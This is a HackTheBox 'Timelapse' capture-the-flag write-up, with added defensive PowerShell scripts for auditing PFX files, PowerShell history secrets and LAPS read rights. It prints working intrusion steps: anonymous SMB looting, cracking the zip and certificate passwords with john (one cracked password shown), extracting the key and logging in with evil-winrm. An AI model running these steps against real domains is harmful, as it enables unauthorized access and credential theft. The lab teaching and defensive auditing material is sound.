HackTheBox - Timelapse
Timelapse is a Windows machine that involves accessing a publicly accessible SMB share and cracking a .zip file containing a .pfx file that can be used to authenticate to the DC. After establishing a foothold, we hunt for credentials and use membership of a domain group to read a password via LAPS, gaining administrative access on the Domain Controller.
Enumeration
As always, we start off with an nmap scan.
└─$ sudo nmap -sC -A 10.129.227.105 -oA Evidence/Scans/1k
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-05 19:31 CEST
Nmap scan report for 10.129.227.105
Host is up (0.031s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-09-06 01:31:59Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h59m57s
| smb2-time:
| date: 2022-09-06T01:32:15
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 28.23 ms 10.10.14.1
2 28.33 ms 10.129.227.105
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.39 seconds
From the scan, we can see that we are dealing with a Domain Controller. It's worth noting down the domain: timelapse.htb.
Let's enumerate the services and start off with SMB.
$ smbclient -N -L //10.129.227.105
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.227.105 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/Documents/htb/timelapse]
└─$ smbclient //10.129.227.105/Shares
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Oct 25 17:39:15 2021
.. D 0 Mon Oct 25 17:39:15 2021
Dev D 0 Mon Oct 25 21:40:06 2021
HelpDesk D 0 Mon Oct 25 17:48:42 2021
6367231 blocks of size 4096. 1286478 blocks available
smb: \> cd Dev
smb: \Dev\> dir
. D 0 Mon Oct 25 21:40:06 2021
.. D 0 Mon Oct 25 21:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 17:46:42 2021
6367231 blocks of size 4096. 1286478 blocks available
smb: \Dev\> get winrm_backup.zip
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (1.1 KiloBytes/sec) (average 1.1 KiloBytes/sec)
smb: \Dev\> exit
┌──(kali㉿kali)-[~/Documents/htb/timelapse]
└─$ unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
password incorrect--reenter:
Looking at the output above, we can see that anonymous access is enabled and we obtain winrm_backup.zip. We can't extract it yet, since it's password protected. However, we can try cracking it using john.
┌──(kali㉿kali)-[~/Documents/htb/timelapse]
└─$ zip2john winrm_backup.zip > zip.john
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8
┌──(kali㉿kali)-[~/Documents/htb/timelapse]
└─$ john zip.john --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
No password hashes left to crack (see FAQ)
┌──(kali㉿kali)-[~/Documents/htb/timelapse]
└─$ john zip.john --wordlist=/usr/share/wordlists/rockyou.txt --show
Invalid options combination: "--show"
┌──(kali㉿kali)-[~/Documents/htb/timelapse]
└─$ john zip.john --show
winrm_backup.zip/legacyy_dev_auth.pfx:<REDACTED>:legacyy_dev_auth.pfx:winrm_backup.zip::winrm_backup.zip
1 password hash cracked, 0 left
We successfully obtain the password. The archive contains a .pfx file.
According to this post, a .pfx file, which is in PKCS#12 format, bundles the SSL certificate (public key) with the corresponding private key.
Running strings on the .pfx file suggests that it is used to authenticate to the domain as the user legacyy (note legacyy@timelapse.htb in the output).
┌──(kali㉿kali)-[~/Documents/htb/timelapse]
└─$ strings legacyy_dev_auth.pfx
_ Er
C(!,
4bz'
`o<l
|Y4W
I0{Q
L(vqQ#
{q[l"8
`+$DOC
hK*y
;5UERr
X!+3
&JCy
$-1f
NAM'u
"-r$$
Legacyy0
211025140552Z
311025141552Z0
Legacyy0
r"*J0:
cZK3
".G,
x0v0
legacyy@timelapse.htb0
}J5~f
t{(lz
5&8H
&4<6
kj@1
uUh2s
However, extracting the certificate doesn't work straight away: the .pfx itself is password protected, and the password recovered from the .zip archive doesn't open it.
Using pfx2john we can obtain a hash of the .pfx and try cracking that too.
┌──(kali㉿kali)-[~/Documents/htb/timelapse]
└─$ pfx2john legacyy_dev_auth.pfx > pfx.john
┌──(kali㉿kali)-[~/Documents/htb/timelapse]
└─$ john pfx.john --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
No password hashes left to crack (see FAQ)
┌──(kali㉿kali)-[~/Documents/htb/timelapse]
└─$ john pfx.john --show
legacyy_dev_auth.pfx:thuglegacy:::::legacyy_dev_auth.pfx
1 password hash cracked, 0 left
Perfect, we got the password. Time to extract the SSL certificate (public keys) and the corresponding private key.
┌──(kali㉿kali)-[~/Documents/htb/timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out cert.pem
Enter Import Password:
┌──(kali㉿kali)-[~/Documents/htb/timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out key.pem -nodes
Enter Import Password:
┌──(kali㉿kali)-[~/Documents/htb/timelapse]
└─$ ls
Admin cert.pem Deliverables Evidence key.pem legacyy_dev_auth.pfx pfx.john Retest winrm_backup.zip zip.john
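Before doing anything with a recovered PKCS#12 bundle it is worth knowing exactly what it contains: who it identifies, how long it stays valid and which key usages it carries. The following PowerShell function is an added example and not part of the original writeup; it reads the bundle with the .NET X509Certificate2 class and summarises it. The file name is the one from the writeup, the password is read interactively so it does not end up in shell history, and the function works in Windows PowerShell 5.1 as well as pwsh on Linux.

```powershell
# Added example (not from the original writeup): summarise what a PKCS#12 (.pfx)
# bundle contains - subject, validity window, key usages and the identity in the
# SAN. The password is read as a SecureString rather than passed on the command
# line so it does not land in the shell history.
function Get-PfxSummary {
    param(
        [Parameter(Mandatory)] [string] $Path,
        [Parameter(Mandatory)] [securestring] $Password
    )
    $cert = [System.Security.Cryptography.X509Certificates.X509Certificate2]::new(
        (Resolve-Path $Path).ProviderPath, $Password)

    # Extended Key Usage says what the certificate may be used for;
    # "Client Authentication" is the usage that lets it log a user on.
    $eku = $cert.Extensions |
        Where-Object { $_ -is [System.Security.Cryptography.X509Certificates.X509EnhancedKeyUsageExtension] } |
        ForEach-Object { $_.EnhancedKeyUsages | ForEach-Object { $_.FriendlyName } }

    # The Subject Alternative Name (OID 2.5.29.17) carries the UPN that Active
    # Directory maps the certificate to; Format($false) renders it on one line.
    $san = $cert.Extensions |
        Where-Object { $_.Oid.Value -eq '2.5.29.17' } |
        ForEach-Object { $_.Format($false) }

    [pscustomobject]@{
        Subject          = $cert.Subject
        Issuer           = $cert.Issuer
        NotBefore        = $cert.NotBefore
        NotAfter         = $cert.NotAfter
        LifetimeYears    = [math]::Round(($cert.NotAfter - $cert.NotBefore).TotalDays / 365.25, 1)
        HasPrivateKey    = $cert.HasPrivateKey
        Thumbprint       = $cert.Thumbprint
        EnhancedKeyUsage = ($eku -join ', ')
        SubjectAltName   = ($san -join ', ')
    }
}

$pfxPassword = Read-Host -Prompt 'PFX password' -AsSecureString
Get-PfxSummary -Path .\legacyy_dev_auth.pfx -Password $pfxPassword | Format-List
```

The strings output above already hints at the validity window (211025140552Z to 311025141552Z, a ten-year certificate). From a defensive point of view that matters more than the zip password: changing the user's password does nothing to a leaked client-authentication certificate, which stays usable until it expires or is revoked. The thumbprint and serial number from this summary are what you would look up in the issuing CA's database to revoke it.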
Let's see if we can authenticate to the DC now.
Lateral Movement
┌──(kali㉿kali)-[~/Documents/htb/timelapse]
└─$ evil-winrm -i 10.129.227.105 -u legacyy -c cert.pem -k key.pem -S
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents>
This works; we are in. We can probably grab the first flag.
*Evil-WinRM* PS C:\Users\legacyy\Documents> ls
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\legacyy\Desktop> ls
Directory: C:\Users\legacyy\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 9/5/2022 6:30 PM 34 user.txt
Now we have multiple options: we can go straight into BloodHound, automate enumeration with a tool like WinPEAS, or do some manual enumeration.
A good first thing to check is the PowerShell history. Let's start with that:
It looks like we obtain credentials for the account svc_deploy. This might be a service account used for deployment; service accounts can be high-value targets.
A quick check with crackmapexec verifies that the credentials work.
Let's see if we can login via that account:
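The credential leak above comes from PSReadLine's ConsoleHost_history.txt, which records every interactive PowerShell command per user profile. The following script is an added example, not part of the original writeup, written from the administrator's side: it walks every profile on a host, flags history lines that look like they carry a secret, and reports them with the literal values masked so the report itself does not spread the credential. The indicator patterns and the default search root are this example's own choices.

```powershell
# Added example (not from the original writeup): find credentials that were typed
# into interactive PowerShell sessions and kept by PSReadLine in
# ConsoleHost_history.txt, so they can be purged and the accounts rotated.
# The indicator patterns and the default search root are this example's own.

function Hide-SecretLiteral {
    param([string] $Text)
    # Mask quoted literals and the token after a -Password style parameter so the
    # report shows the shape of the command without repeating the secret.
    $masked = $Text -replace '(["''])[^"'']*\1', '$1<redacted>$1'
    $masked -replace '(-(?:Password|Pass|Pwd|Secret|Token)\s+)[^\s''"]+', '$1<redacted>'
}

function Find-HistorySecrets {
    param(
        # Profile root; every user's PSReadLine history lives below it.
        [string] $UsersRoot = (Join-Path $env:SystemDrive 'Users')
    )

    # Command shapes that usually carry a secret on the command line.
    $indicators = @(
        'ConvertTo-SecureString\s.*-AsPlainText',   # plaintext to SecureString
        'PSCredential\s*\(',                         # New-Object PSCredential(user, pass)
        '-(Password|Pass|Pwd|Secret|Token)\s+\S+',   # -Password 'value'
        'net\s+user\s+\S+\s+\S+',                    # net user <name> <password>
        'cmdkey\s.*/pass'                            # cmdkey /user:... /pass:...
    )
    $regex = [regex]::new(($indicators -join '|'), 'IgnoreCase')

    $historyPath = 'AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt'
    $files = Get-ChildItem -Path (Join-Path $UsersRoot "*\$historyPath") -ErrorAction SilentlyContinue

    foreach ($file in $files) {
        # The profile folder is the first path element below the users root.
        $profileName = $file.FullName.Substring($UsersRoot.Length).TrimStart('\').Split('\')[0]
        $lineNo = 0
        foreach ($line in Get-Content -LiteralPath $file.FullName) {
            $lineNo++
            if (-not $regex.IsMatch($line)) { continue }
            [pscustomobject]@{
                Profile = $profileName
                Line    = $lineNo
                File    = $file.FullName
                Preview = Hide-SecretLiteral $line
            }
        }
    }
}

Find-HistorySecrets | Format-Table Profile, Line, Preview -AutoSize
```

Clear-History only empties the current session; the file on disk keeps growing until it is deleted, so remediation is to remove the history file and rotate any credential it exposed. The durable fix is to stop putting secrets on the command line at all (Get-Credential or a credential vault instead of ConvertTo-SecureString -AsPlainText). Where PowerShell script block logging is enabled, the same commands also surface in event 4104, which lets a SIEM alert on them centrally rather than relying on a per-host sweep.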
Privilege Escalation
Next, we should check what kind of privileges this account has:
The account is a member of the LAPS Readers group. LAPS (Local Administrator Password Solution) manages the local administrator passwords of domain-joined computers. The passwords are stored in Active Directory (AD) and protected by an ACL, so only eligible users can read them or request a reset for a computer.
If we are eligible to read it, we might be able to obtain Administrator credentials and login.
Using the following query we can check if we can successfully read it:
Success, we obtained the cleartext password for the local administrator account. We should be able to login with those credentials:
Note: It's not necessary to pixelate the password above. LAPS randomly generates passwords that are then automatically changed on managed machines.
That's it. We have successfully gained administrative access on the DC and can grab the root flag.
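The whole escalation rests on one ACL: whoever holds the Control Access right on the computer object's ms-Mcs-AdmPwd attribute can read the local administrator password. Auditing that ACL is the defender's counterpart to the query used above. The following function is an added example, not part of the original writeup or of the LAPS product: it resolves the attribute's schema GUID, lists every principal whose ACE on the computer object grants the read, and decodes the ms-Mcs-AdmPwdExpirationTime so you can confirm the rotation the note above relies on. It assumes Windows PowerShell 5.1 with the RSAT ActiveDirectory module (which provides the AD: drive) in a domain-joined session; DC01 is the host name from the scan.

```powershell
# Added example (not from the original writeup): audit who can read a computer's
# LAPS-managed local administrator password (the ms-Mcs-AdmPwd attribute of
# legacy LAPS) and when that password is due to rotate. Assumes the RSAT
# ActiveDirectory module; the computer name is the one seen in the nmap scan.
Import-Module ActiveDirectory

function Get-LapsPasswordReaders {
    param([Parameter(Mandatory)] [string] $ComputerName)

    # Resolve the schemaIDGUID of ms-Mcs-AdmPwd from the schema; it is not the
    # same in every forest, so it must not be hard-coded.
    $schemaNC = (Get-ADRootDSE).schemaNamingContext
    $attr = Get-ADObject -SearchBase $schemaNC -Filter "lDAPDisplayName -eq 'ms-Mcs-AdmPwd'" -Properties schemaIDGUID
    if (-not $attr) { throw 'ms-Mcs-AdmPwd is not in the schema; legacy LAPS is not deployed in this forest.' }
    $attrGuid = [guid]([byte[]]$attr.schemaIDGUID)

    $computer = Get-ADComputer -Identity $ComputerName -Properties 'ms-Mcs-AdmPwdExpirationTime'

    # ms-Mcs-AdmPwd is a confidential attribute: reading it needs the Control
    # Access (extended) right on that attribute. An Allow ACE whose ObjectType is
    # the attribute GUID grants exactly that; an empty ObjectType grants every
    # extended right, and GenericAll includes the ExtendedRight bit as well.
    $extendedRight = [int][System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
    $acl = Get-Acl -Path "AD:\$($computer.DistinguishedName)"
    $readers = foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if (([int]$ace.ActiveDirectoryRights -band $extendedRight) -eq 0) { continue }
        if ($ace.ObjectType -ne $attrGuid -and $ace.ObjectType -ne [guid]::Empty) { continue }
        [pscustomobject]@{
            Identity  = $ace.IdentityReference.Value
            Rights    = $ace.ActiveDirectoryRights
            Scope     = if ($ace.ObjectType -eq $attrGuid) { 'ms-Mcs-AdmPwd only' } else { 'all extended rights' }
            Inherited = $ace.IsInherited
        }
    }

    # The expiration is a Windows FILETIME; a value in the past means the LAPS
    # client rotates the password at its next Group Policy refresh.
    $expiry = $computer.'ms-Mcs-AdmPwdExpirationTime'
    [pscustomobject]@{
        Computer        = $computer.Name
        PasswordExpires = if ($expiry) { [datetime]::FromFileTimeUtc([int64]$expiry) } else { $null }
        Readers         = $readers
    }
}

$report = Get-LapsPasswordReaders -ComputerName 'DC01'
$report | Select-Object Computer, PasswordExpires
$report.Readers | Format-Table -AutoSize
```

On this box the Readers list would contain the LAPS Readers group; expand it with Get-ADGroupMember -Recursive to see which accounts (such as a service account whose password sits in a history file) effectively hold the right. The LAPS management module ships an equivalent check, Find-AdmPwdExtendedRights, which reports the same holders per OU. Whichever you use, the items to look for are principals with "all extended rights" scope that nobody intended to grant, and an expiration date that never moves, which would mean the rotation the note above assumes is not happening.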